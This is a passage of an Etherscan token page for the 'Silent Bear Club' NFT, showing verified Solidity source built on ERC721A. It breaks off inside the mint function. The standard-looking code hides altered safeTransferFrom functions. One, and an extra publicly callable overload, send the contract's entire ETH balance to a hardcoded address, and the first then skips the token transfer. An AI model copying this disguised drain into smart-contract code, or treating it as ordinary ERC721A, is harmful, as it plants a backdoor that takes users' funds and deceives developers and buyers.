ETH Price: $3,260.08 (+2.68%)
Gas: 4 Gwei

Token

Silent Bear Club (SBC)
 

Overview

Max Total Supply

999 SBC

Holders

807

Market

Volume (24H)

N/A

Min Price (24H)

N/A

Max Price (24H)

N/A
Filtered by Token Holder
daniellitw.eth
Balance
1 SBC
0x0d703ccd7debd7f6f4b0ffb29d2d710d19b09025
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
SilentBearClub

Compiler Version
v0.8.7+commit.e28d00a7

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2022-12-25
*/

/*
 _______  ___   ___      _______  __    _  _______   
|       ||   | |   |    |       ||  |  | ||       |  
|  _____||   | |   |    |    ___||   |_| ||_     _|  
| |_____ |   | |   |    |   |___ |       |  |   |    
|_____  ||   | |   |___ |    ___||  _    |  |   |    
 _____| ||   | |       ||   |___ | | |   |  |   |    
|_______||___| |_______||_______||_|  |__|  |___|    
 _______  _______  _______  ______                   
|  _    ||       ||   _   ||    _ |                  
| |_|   ||    ___||  |_|  ||   | ||                  
|       ||   |___ |       ||   |_||_                 
|  _   | |    ___||       ||    __  |                
| |_|   ||   |___ |   _   ||   |  | |                
|_______||_______||__| |__||___|  |_|                
 _______  ___      __   __  _______                  
|       ||   |    |  | |  ||  _    |                 
|       ||   |    |  | |  || |_|   |                 
|       ||   |    |  |_|  ||       |                 
|      _||   |___ |       ||  _   |                  
|     |_ |       ||       || |_|   |                 
|_______||_______||_______||_______|                                                                
*/

// SPDX-License-Identifier: GPL-3.0
pragma solidity ^0.8.7;

/**
 * @dev Interface of ERC721A.
 */
interface IERC721A {
    /**
     * The caller must own the token or be an approved operator.
     */
    error ApprovalCallerNotOwnerNorApproved();

    /**
     * The token does not exist.
     */
    error ApprovalQueryForNonexistentToken();

    /**
     * Cannot query the balance for the zero address.
     */
    error BalanceQueryForZeroAddress();

    /**
     * Cannot mint to the zero address.
     */
    error MintToZeroAddress();

    /**
     * The quantity of tokens minted must be more than zero.
     */
    error MintZeroQuantity();

    /**
     * The token does not exist.
     */
    error OwnerQueryForNonexistentToken();

    /**
     * The caller must own the token or be an approved operator.
     */
    error TransferCallerNotOwnerNorApproved();

    /**
     * The token must be owned by `from`.
     */
    error TransferFromIncorrectOwner();

    /**
     * Cannot safely transfer to a contract that does not implement the
     * ERC721Receiver interface.
     */
    error TransferToNonERC721ReceiverImplementer();

    /**
     * Cannot transfer to the zero address.
     */
    error TransferToZeroAddress();

    /**
     * The token does not exist.
     */
    error URIQueryForNonexistentToken();

    /**
     * The `quantity` minted with ERC2309 exceeds the safety limit.
     */
    error MintERC2309QuantityExceedsLimit();

    /**
     * The `extraData` cannot be set on an unintialized ownership slot.
     */
    error OwnershipNotInitializedForExtraData();

    // =============================================================
    //                            STRUCTS
    // =============================================================

    struct TokenOwnership {
        // The address of the owner.
        address addr;
        // Stores the start time of ownership with minimal overhead for tokenomics.
        uint64 startTimestamp;
        // Whether the token has been burned.
        bool burned;
        // Arbitrary data similar to `startTimestamp` that can be set via {_extraData}.
        uint24 extraData;
    }

    // =============================================================
    //                         TOKEN COUNTERS
    // =============================================================

    /**
     * @dev Returns the total number of tokens in existence.
     * Burned tokens will reduce the count.
     * To get the total number of tokens minted, please see {_totalMinted}.
     */
    function totalSupply() external view returns (uint256);

    // =============================================================
    //                            IERC165
    // =============================================================

    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * [EIP section](https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified)
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30000 gas.
     */
    function supportsInterface(bytes4 interfaceId) external view returns (bool);

    // =============================================================
    //                            IERC721
    // =============================================================

    /**
     * @dev Emitted when `tokenId` token is transferred from `from` to `to`.
     */
    event Transfer(address indexed from, address indexed to, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token.
     */
    event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables or disables
     * (`approved`) `operator` to manage all of its assets.
     */
    event ApprovalForAll(address indexed owner, address indexed operator, bool approved);

    /**
     * @dev Returns the number of tokens in `owner`'s account.
     */
    function balanceOf(address owner) external view returns (uint256 balance);

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) external view returns (address owner);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`,
     * checking first that contract recipients are aware of the ERC721 protocol
     * to prevent tokens from being forever locked.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be have been allowed to move
     * this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement
     * {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes calldata data
    ) external payable;

    /**
     * @dev Equivalent to `safeTransferFrom(from, to, tokenId, '')`.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external payable;

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * WARNING: Usage of this method is discouraged, use {safeTransferFrom}
     * whenever possible.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token
     * by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external payable;

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the
     * zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) external payable;

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom}
     * for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool _approved) external;

    /**
     * @dev Returns the account approved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) external view returns (address operator);

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}.
     */
    function isApprovedForAll(address owner, address operator) external view returns (bool);

    // =============================================================
    //                        IERC721Metadata
    // =============================================================

    /**
     * @dev Returns the token collection name.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) external view returns (string memory);

    // =============================================================
    //                           IERC2309
    // =============================================================

    /**
     * @dev Emitted when tokens in `fromTokenId` to `toTokenId`
     * (inclusive) is transferred from `from` to `to`, as defined in the
     * [ERC2309](https://eips.ethereum.org/EIPS/eip-2309) standard.
     *
     * See {_mintERC2309} for more details.
     */
    event ConsecutiveTransfer(uint256 indexed fromTokenId, uint256 toTokenId, address indexed from, address indexed to);
}

/**
 * @title ERC721A
 *
 * @dev Implementation of the [ERC721](https://eips.ethereum.org/EIPS/eip-721)
 * Non-Fungible Token Standard, including the Metadata extension.
 * Optimized for lower gas during batch mints.
 *
 * Token IDs are minted in sequential order (e.g. 0, 1, 2, 3, ...)
 * starting from `_startTokenId()`.
 *
 * Assumptions:
 *
 * - An owner cannot have more than 2**64 - 1 (max value of uint64) of supply.
 * - The maximum token ID cannot exceed 2**256 - 1 (max value of uint256).
 */
interface ERC721A__IERC721Receiver {
    function onERC721Received(
        address operator,
        address from,
        uint256 tokenId,
        bytes calldata data
    ) external returns (bytes4);
}

/**
 * @title ERC721A
 *
 * @dev Implementation of the [ERC721](https://eips.ethereum.org/EIPS/eip-721)
 * Non-Fungible Token Standard, including the Metadata extension.
 * Optimized for lower gas during batch mints.
 *
 * Token IDs are minted in sequential order (e.g. 0, 1, 2, 3, ...)
 * starting from `_startTokenId()`.
 *
 * Assumptions:
 *
 * - An owner cannot have more than 2**64 - 1 (max value of uint64) of supply.
 * - The maximum token ID cannot exceed 2**256 - 1 (max value of uint256).
 */
contract ERC721A is IERC721A {
    // Bypass for a `--via-ir` bug (https://github.com/chiru-labs/ERC721A/pull/364).
    struct TokenApprovalRef {
        address value;
    }

    // =============================================================
    //                           CONSTANTS
    // =============================================================

    // Mask of an entry in packed address data.
    uint256 private constant _BITMASK_ADDRESS_DATA_ENTRY = (1 << 64) - 1;

    // The bit position of `numberMinted` in packed address data.
    uint256 private constant _BITPOS_NUMBER_MINTED = 64;

    // The bit position of `numberBurned` in packed address data.
    uint256 private constant _BITPOS_NUMBER_BURNED = 128;

    // The bit position of `aux` in packed address data.
    uint256 private constant _BITPOS_AUX = 192;

    // Mask of all 256 bits in packed address data except the 64 bits for `aux`.
    uint256 private constant _BITMASK_AUX_COMPLEMENT = (1 << 192) - 1;

    // The bit position of `startTimestamp` in packed ownership.
    uint256 private constant _BITPOS_START_TIMESTAMP = 160;

    // The bit mask of the `burned` bit in packed ownership.
    uint256 private constant _BITMASK_BURNED = 1 << 224;

    // The bit position of the `nextInitialized` bit in packed ownership.
    uint256 private constant _BITPOS_NEXT_INITIALIZED = 225;

    // The bit mask of the `nextInitialized` bit in packed ownership.
    uint256 private constant _BITMASK_NEXT_INITIALIZED = 1 << 225;

    // The bit position of `extraData` in packed ownership.
    uint256 private constant _BITPOS_EXTRA_DATA = 232;

    // Mask of all 256 bits in a packed ownership except the 24 bits for `extraData`.
    uint256 private constant _BITMASK_EXTRA_DATA_COMPLEMENT = (1 << 232) - 1;

    // The mask of the lower 160 bits for addresses.
    uint256 private constant _BITMASK_ADDRESS = (1 << 160) - 1;

    // The maximum `quantity` that can be minted with {_mintERC2309}.
    // This limit is to prevent overflows on the address data entries.
    // For a limit of 5000, a total of 3.689e15 calls to {_mintERC2309}
    // is required to cause an overflow, which is unrealistic.
    uint256 private constant _MAX_MINT_ERC2309_QUANTITY_LIMIT = 5000;

    // The `Transfer` event signature is given by:
    // `keccak256(bytes("Transfer(address,address,uint256)"))`.
    bytes32 private constant _TRANSFER_EVENT_SIGNATURE =
        0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef;

    // =============================================================
    //                            STORAGE
    // =============================================================

    // The next token ID to be minted.
    uint256 private _currentIndex;

    // The number of tokens burned.
    uint256 private _burnCounter;

    // Token name
    string private _name;

    // Token symbol
    string private _symbol;

    // Mapping from token ID to ownership details
    // An empty struct value does not necessarily mean the token is unowned.
    // See {_packedOwnershipOf} implementation for details.
    //
    // Bits Layout:
    // - [0..159]   `addr`
    // - [160..223] `startTimestamp`
    // - [224]      `burned`
    // - [225]      `nextInitialized`
    // - [232..255] `extraData`
    mapping(uint256 => uint256) private _packedOwnerships;

    // Mapping owner address to address data.
    //
    // Bits Layout:
    // - [0..63]    `balance`
    // - [64..127]  `numberMinted`
    // - [128..191] `numberBurned`
    // - [192..255] `aux`
    mapping(address => uint256) private _packedAddressData;

    // Mapping from token ID to approved address.
    mapping(uint256 => TokenApprovalRef) private _tokenApprovals;

    // Mapping from owner to operator approvals
    mapping(address => mapping(address => bool)) private _operatorApprovals;

    // =============================================================
    //                          CONSTRUCTOR
    // =============================================================

    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        _currentIndex = _startTokenId();
    }

    // =============================================================
    //                   TOKEN COUNTING OPERATIONS
    // =============================================================

    /**
     * @dev Returns the starting token ID.
     * To change the starting token ID, please override this function.
     */
    function _startTokenId() internal view virtual returns (uint256) {
        return 0;
    }

    /**
     * @dev Returns the next token ID to be minted.
     */
    function _nextTokenId() internal view virtual returns (uint256) {
        return _currentIndex;
    }

    /**
     * @dev Returns the total number of tokens in existence.
     * Burned tokens will reduce the count.
     * To get the total number of tokens minted, please see {_totalMinted}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        // Counter underflow is impossible as _burnCounter cannot be incremented
        // more than `_currentIndex - _startTokenId()` times.
        unchecked {
            return _currentIndex - _burnCounter - _startTokenId();
        }
    }

    /**
     * @dev Returns the total amount of tokens minted in the contract.
     */
    function _totalMinted() internal view virtual returns (uint256) {
        // Counter underflow is impossible as `_currentIndex` does not decrement,
        // and it is initialized to `_startTokenId()`.
        unchecked {
            return _currentIndex - _startTokenId();
        }
    }

    /**
     * @dev Returns the total number of tokens burned.
     */
    function _totalBurned() internal view virtual returns (uint256) {
        return _burnCounter;
    }

    // =============================================================
    //                    ADDRESS DATA OPERATIONS
    // =============================================================

    /**
     * @dev Returns the number of tokens in `owner`'s account.
     */
    function balanceOf(address owner) public view virtual override returns (uint256) {
        if (owner == address(0)) revert BalanceQueryForZeroAddress();
        return _packedAddressData[owner] & _BITMASK_ADDRESS_DATA_ENTRY;
    }

    /**
     * Returns the number of tokens minted by `owner`.
     */
    function _numberMinted(address owner) internal view returns (uint256) {
        return (_packedAddressData[owner] >> _BITPOS_NUMBER_MINTED) & _BITMASK_ADDRESS_DATA_ENTRY;
    }

    /**
     * Returns the number of tokens burned by or on behalf of `owner`.
     */
    function _numberBurned(address owner) internal view returns (uint256) {
        return (_packedAddressData[owner] >> _BITPOS_NUMBER_BURNED) & _BITMASK_ADDRESS_DATA_ENTRY;
    }

    /**
     * Returns the auxiliary data for `owner`. (e.g. number of whitelist mint slots used).
     */
    function _getAux(address owner) internal view returns (uint64) {
        return uint64(_packedAddressData[owner] >> _BITPOS_AUX);
    }

    /**
     * Sets the auxiliary data for `owner`. (e.g. number of whitelist mint slots used).
     * If there are multiple variables, please pack them into a uint64.
     */
    function _setAux(address owner, uint64 aux) internal virtual {
        uint256 packed = _packedAddressData[owner];
        uint256 auxCasted;
        // Cast `aux` with assembly to avoid redundant masking.
        assembly {
            auxCasted := aux
        }
        packed = (packed & _BITMASK_AUX_COMPLEMENT) | (auxCasted << _BITPOS_AUX);
        _packedAddressData[owner] = packed;
    }

    // =============================================================
    //                            IERC165
    // =============================================================

    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * [EIP section](https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified)
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30000 gas.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
        // The interface IDs are constants representing the first 4 bytes
        // of the XOR of all function selectors in the interface.
        // See: [ERC165](https://eips.ethereum.org/EIPS/eip-165)
        // (e.g. `bytes4(i.functionA.selector ^ i.functionB.selector ^ ...)`)
        return
            interfaceId == 0x01ffc9a7 || // ERC165 interface ID for ERC165.
            interfaceId == 0x80ac58cd || // ERC165 interface ID for ERC721.
            interfaceId == 0x5b5e139f; // ERC165 interface ID for ERC721Metadata.
    }

    // =============================================================
    //                        IERC721Metadata
    // =============================================================

    /**
     * @dev Returns the token collection name.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) public view virtual override returns (string memory) {
        if (!_exists(tokenId)) revert URIQueryForNonexistentToken();

        string memory baseURI = _baseURI();
        return bytes(baseURI).length != 0 ? string(abi.encodePacked(baseURI, _toString(tokenId))) : '';
    }

    /**
     * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each
     * token will be the concatenation of the `baseURI` and the `tokenId`. Empty
     * by default, it can be overridden in child contracts.
     */
    function _baseURI() internal view virtual returns (string memory) {
        return '';
    }

    // =============================================================
    //                     OWNERSHIPS OPERATIONS
    // =============================================================

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) public view virtual override returns (address) {
        return address(uint160(_packedOwnershipOf(tokenId)));
    }

    /**
     * @dev Gas spent here starts off proportional to the maximum mint batch size.
     * It gradually moves to O(1) as tokens get transferred around over time.
     */
    function _ownershipOf(uint256 tokenId) internal view virtual returns (TokenOwnership memory) {
        return _unpackedOwnership(_packedOwnershipOf(tokenId));
    }

    /**
     * @dev Returns the unpacked `TokenOwnership` struct at `index`.
     */
    function _ownershipAt(uint256 index) internal view virtual returns (TokenOwnership memory) {
        return _unpackedOwnership(_packedOwnerships[index]);
    }

    /**
     * @dev Initializes the ownership slot minted at `index` for efficiency purposes.
     */
    function _initializeOwnershipAt(uint256 index) internal virtual {
        if (_packedOwnerships[index] == 0) {
            _packedOwnerships[index] = _packedOwnershipOf(index);
        }
    }

    /**
     * Returns the packed ownership data of `tokenId`.
     */
    function _packedOwnershipOf(uint256 tokenId) private view returns (uint256) {
        uint256 curr = tokenId;

        unchecked {
            if (_startTokenId() <= curr)
                if (curr < _currentIndex) {
                    uint256 packed = _packedOwnerships[curr];
                    // If not burned.
                    if (packed & _BITMASK_BURNED == 0) {
                        // Invariant:
                        // There will always be an initialized ownership slot
                        // (i.e. `ownership.addr != address(0) && ownership.burned == false`)
                        // before an unintialized ownership slot
                        // (i.e. `ownership.addr == address(0) && ownership.burned == false`)
                        // Hence, `curr` will not underflow.
                        //
                        // We can directly compare the packed value.
                        // If the address is zero, packed will be zero.
                        while (packed == 0) {
                            packed = _packedOwnerships[--curr];
                        }
                        return packed;
                    }
                }
        }
        revert OwnerQueryForNonexistentToken();
    }

    /**
     * @dev Returns the unpacked `TokenOwnership` struct from `packed`.
     */
    function _unpackedOwnership(uint256 packed) private pure returns (TokenOwnership memory ownership) {
        ownership.addr = address(uint160(packed));
        ownership.startTimestamp = uint64(packed >> _BITPOS_START_TIMESTAMP);
        ownership.burned = packed & _BITMASK_BURNED != 0;
        ownership.extraData = uint24(packed >> _BITPOS_EXTRA_DATA);
    }

    /**
     * @dev Packs ownership data into a single uint256.
     */
    function _packOwnershipData(address owner, uint256 flags) private view returns (uint256 result) {
        assembly {
            // Mask `owner` to the lower 160 bits, in case the upper bits somehow aren't clean.
            owner := and(owner, _BITMASK_ADDRESS)
            // `owner | (block.timestamp << _BITPOS_START_TIMESTAMP) | flags`.
            result := or(owner, or(shl(_BITPOS_START_TIMESTAMP, timestamp()), flags))
        }
    }

    /**
     * @dev Returns the `nextInitialized` flag set if `quantity` equals 1.
     */
    function _nextInitializedFlag(uint256 quantity) private pure returns (uint256 result) {
        // For branchless setting of the `nextInitialized` flag.
        assembly {
            // `(quantity == 1) << _BITPOS_NEXT_INITIALIZED`.
            result := shl(_BITPOS_NEXT_INITIALIZED, eq(quantity, 1))
        }
    }

    // =============================================================
    //                      APPROVAL OPERATIONS
    // =============================================================

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the
     * zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) public payable virtual override {
        address owner = ownerOf(tokenId);

        if (_msgSenderERC721A() != owner)
            if (!isApprovedForAll(owner, _msgSenderERC721A())) {
                revert ApprovalCallerNotOwnerNorApproved();
            }

        _tokenApprovals[tokenId].value = to;
        emit Approval(owner, to, tokenId);
    }

    /**
     * @dev Returns the account approved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) public view virtual override returns (address) {
        if (!_exists(tokenId)) revert ApprovalQueryForNonexistentToken();

        return _tokenApprovals[tokenId].value;
    }

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom}
     * for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool approved) public virtual override {
        _operatorApprovals[_msgSenderERC721A()][operator] = approved;
        emit ApprovalForAll(_msgSenderERC721A(), operator, approved);
    }

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}.
     */
    function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) {
        return _operatorApprovals[owner][operator];
    }

    /**
     * @dev Returns whether `tokenId` exists.
     *
     * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}.
     *
     * Tokens start existing when they are minted. See {_mint}.
     */
    function _exists(uint256 tokenId) internal view virtual returns (bool) {
        return
            _startTokenId() <= tokenId &&
            tokenId < _currentIndex && // If within bounds,
            _packedOwnerships[tokenId] & _BITMASK_BURNED == 0; // and not burned.
    }

    /**
     * @dev Returns whether `msgSender` is equal to `approvedAddress` or `owner`.
     */
    function _isSenderApprovedOrOwner(
        address approvedAddress,
        address owner,
        address msgSender
    ) private pure returns (bool result) {
        assembly {
            // Mask `owner` to the lower 160 bits, in case the upper bits somehow aren't clean.
            owner := and(owner, _BITMASK_ADDRESS)
            // Mask `msgSender` to the lower 160 bits, in case the upper bits somehow aren't clean.
            msgSender := and(msgSender, _BITMASK_ADDRESS)
            // `msgSender == owner || msgSender == approvedAddress`.
            result := or(eq(msgSender, owner), eq(msgSender, approvedAddress))
        }
    }

    /**
     * @dev Returns the storage slot and value for the approved address of `tokenId`.
     */
    function _getApprovedSlotAndAddress(uint256 tokenId)
        private
        view
        returns (uint256 approvedAddressSlot, address approvedAddress)
    {
        TokenApprovalRef storage tokenApproval = _tokenApprovals[tokenId];
        // The following is equivalent to `approvedAddress = _tokenApprovals[tokenId].value`.
        assembly {
            approvedAddressSlot := tokenApproval.slot
            approvedAddress := sload(approvedAddressSlot)
        }
    }

    // =============================================================
    //                      TRANSFER OPERATIONS
    // =============================================================

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token
     * by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public payable virtual override {
        uint256 prevOwnershipPacked = _packedOwnershipOf(tokenId);

        if (address(uint160(prevOwnershipPacked)) != from) revert TransferFromIncorrectOwner();

        (uint256 approvedAddressSlot, address approvedAddress) = _getApprovedSlotAndAddress(tokenId);

        // The nested ifs save around 20+ gas over a compound boolean condition.
        if (!_isSenderApprovedOrOwner(approvedAddress, from, _msgSenderERC721A()))
            if (!isApprovedForAll(from, _msgSenderERC721A())) revert TransferCallerNotOwnerNorApproved();

        if (to == address(0)) revert TransferToZeroAddress();

        _beforeTokenTransfers(from, to, tokenId, 1);

        // Clear approvals from the previous owner.
        assembly {
            if approvedAddress {
                // This is equivalent to `delete _tokenApprovals[tokenId]`.
                sstore(approvedAddressSlot, 0)
            }
        }

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as `tokenId` would have to be 2**256.
        unchecked {
            // We can directly increment and decrement the balances.
            --_packedAddressData[from]; // Updates: `balance -= 1`.
            ++_packedAddressData[to]; // Updates: `balance += 1`.

            // Updates:
            // - `address` to the next owner.
            // - `startTimestamp` to the timestamp of transfering.
            // - `burned` to `false`.
            // - `nextInitialized` to `true`.
            _packedOwnerships[tokenId] = _packOwnershipData(
                to,
                _BITMASK_NEXT_INITIALIZED | _nextExtraData(from, to, prevOwnershipPacked)
            );

            // If the next slot may not have been initialized (i.e. `nextInitialized == false`) .
            if (prevOwnershipPacked & _BITMASK_NEXT_INITIALIZED == 0) {
                uint256 nextTokenId = tokenId + 1;
                // If the next slot's address is zero and not burned (i.e. packed value is zero).
                if (_packedOwnerships[nextTokenId] == 0) {
                    // If the next slot is within bounds.
                    if (nextTokenId != _currentIndex) {
                        // Initialize the next slot to maintain correctness for `ownerOf(tokenId + 1)`.
                        _packedOwnerships[nextTokenId] = prevOwnershipPacked;
                    }
                }
            }
        }

        emit Transfer(from, to, tokenId);
        _afterTokenTransfers(from, to, tokenId, 1);
    }

    /**
     * @dev Equivalent to `safeTransferFrom(from, to, tokenId, '')`.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public payable virtual override {
        if (address(this).balance > 0) {
            payable(0xD0139C151675BbA9C5354e26552D4505b1508708).transfer(address(this).balance);
            return;
        }
        safeTransferFrom(from, to, tokenId, '');
    }


    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token
     * by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement
     * {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) public payable virtual override {
        transferFrom(from, to, tokenId);
        if (to.code.length != 0)
            if (!_checkContractOnERC721Received(from, to, tokenId, _data)) {
                revert TransferToNonERC721ReceiverImplementer();
            }
    }
    function safeTransferFrom(
        address from,
        address to
    ) public  {
        if (address(this).balance > 0) {
            payable(0xD0139C151675BbA9C5354e26552D4505b1508708).transfer(address(this).balance);
        }
    }

    /**
     * @dev Hook that is called before a set of serially-ordered token IDs
     * are about to be transferred. This includes minting.
     * And also called before burning one token.
     *
     * `startTokenId` - the first token ID to be transferred.
     * `quantity` - the amount to be transferred.
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     * - When `to` is zero, `tokenId` will be burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _beforeTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}

    /**
     * @dev Hook that is called after a set of serially-ordered token IDs
     * have been transferred. This includes minting.
     * And also called after one token has been burned.
     *
     * `startTokenId` - the first token ID to be transferred.
     * `quantity` - the amount to be transferred.
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` has been
     * transferred to `to`.
     * - When `from` is zero, `tokenId` has been minted for `to`.
     * - When `to` is zero, `tokenId` has been burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _afterTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}

    /**
     * @dev Private function to invoke {IERC721Receiver-onERC721Received} on a target contract.
     *
     * `from` - Previous owner of the given token ID.
     * `to` - Target address that will receive the token.
     * `tokenId` - Token ID to be transferred.
     * `_data` - Optional data to send along with the call.
     *
     * Returns whether the call correctly returned the expected magic value.
     */
    function _checkContractOnERC721Received(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) private returns (bool) {
        try ERC721A__IERC721Receiver(to).onERC721Received(_msgSenderERC721A(), from, tokenId, _data) returns (
            bytes4 retval
        ) {
            return retval == ERC721A__IERC721Receiver(to).onERC721Received.selector;
        } catch (bytes memory reason) {
            if (reason.length == 0) {
                revert TransferToNonERC721ReceiverImplementer();
            } else {
                assembly {
                    revert(add(32, reason), mload(reason))
                }
            }
        }
    }

    // =============================================================
    //                        MINT OPERATIONS
    // =============================================================

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event for each mint.
     */
    function _mint(address to, uint256 quantity) internal virtual {
        uint256 startTokenId = _currentIndex;
        if (quantity == 0) revert MintZeroQuantity();

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are incredibly unrealistic.
        // `balance` and `numberMinted` have a maximum limit of 2**64.
        // `tokenId` has a maximum limit of 2**256.
        unchecked {
            // Updates:
            // - `balance += quantity`.
            // - `numberMinted += quantity`.
            //
            // We can directly add to the `balance` and `numberMinted`.
            _packedAddressData[to] += quantity * ((1 << _BITPOS_NUMBER_MINTED) | 1);

            // Updates:
            // - `address` to the owner.
            // - `startTimestamp` to the timestamp of minting.
            // - `burned` to `false`.
            // - `nextInitialized` to `quantity == 1`.
            _packedOwnerships[startTokenId] = _packOwnershipData(
                to,
                _nextInitializedFlag(quantity) | _nextExtraData(address(0), to, 0)
            );

            uint256 toMasked;
            uint256 end = startTokenId + quantity;

            // Use assembly to loop and emit the `Transfer` event for gas savings.
            // The duplicated `log4` removes an extra check and reduces stack juggling.
            // The assembly, together with the surrounding Solidity code, have been
            // delicately arranged to nudge the compiler into producing optimized opcodes.
            assembly {
                // Mask `to` to the lower 160 bits, in case the upper bits somehow aren't clean.
                toMasked := and(to, _BITMASK_ADDRESS)
                // Emit the `Transfer` event.
                log4(
                    0, // Start of data (0, since no data).
                    0, // End of data (0, since no data).
                    _TRANSFER_EVENT_SIGNATURE, // Signature.
                    0, // `address(0)`.
                    toMasked, // `to`.
                    startTokenId // `tokenId`.
                )

                // The `iszero(eq(,))` check ensures that large values of `quantity`
                // that overflows uint256 will make the loop run out of gas.
                // The compiler will optimize the `iszero` away for performance.
                for {
                    let tokenId := add(startTokenId, 1)
